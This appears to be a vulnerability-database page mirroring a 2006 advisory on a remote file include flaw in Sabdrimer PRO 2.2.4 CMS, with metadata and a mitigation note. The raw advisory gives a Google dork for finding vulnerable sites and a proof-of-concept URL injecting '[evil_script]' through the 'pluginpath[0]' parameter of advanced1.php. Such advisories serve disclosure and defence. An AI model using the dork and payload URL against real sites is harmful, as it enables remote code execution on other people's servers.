header-logo
Suggest Exploit
vendor:
Sabdrimer CMS
by:
A.nosrati
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Sabdrimer CMS
Affected Version From: 2.2.4
Affected Version To: 2.2.4
Patch Exists: NO
Related CWE: N/A
CPE: a:sabdrimer:sabdrimer_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Sabdrimer PRO (v.2.2.4 ) Remote File Include Vulnerability

Sabdrimer PRO (v.2.2.4 ) is vulnerable to a Remote File Include vulnerability. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'pluginpath[0]' parameter of the 'advanced1.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by sending a specially crafted HTTP request containing malicious code. The vulnerability is only exploitable if the 'register_globals' PHP option is set to 'On'.

Mitigation:

Disable the 'register_globals' PHP option and ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

VIRANGAR SECURITY TEAM
Discovered By : A.nosrati
 www.virangar.org (Public)
 www.virangar.net (Priv8)
 Mail: info[at]virangar.net

Sabdrimer PRO (v.2.2.4 ) Remote File Include Vulnerability
Google Dork : "© Sabdrimer CMS"
bug found in file : advanced1.php
web Site : http://sabdrimer.ru
Remote : Yes
Critical Level : Dangerous

http://www.website.com/skins/advanced/advanced1.php?pluginpath[0]=[evil_script]
Important :register_globals=On

-----------------------
Greetz : All #Virangar Members
I work in the dark 
I Get what I want 

# milw0rm.com [2006-07-09]

Navigation

Suggest Exploit

Services By CQR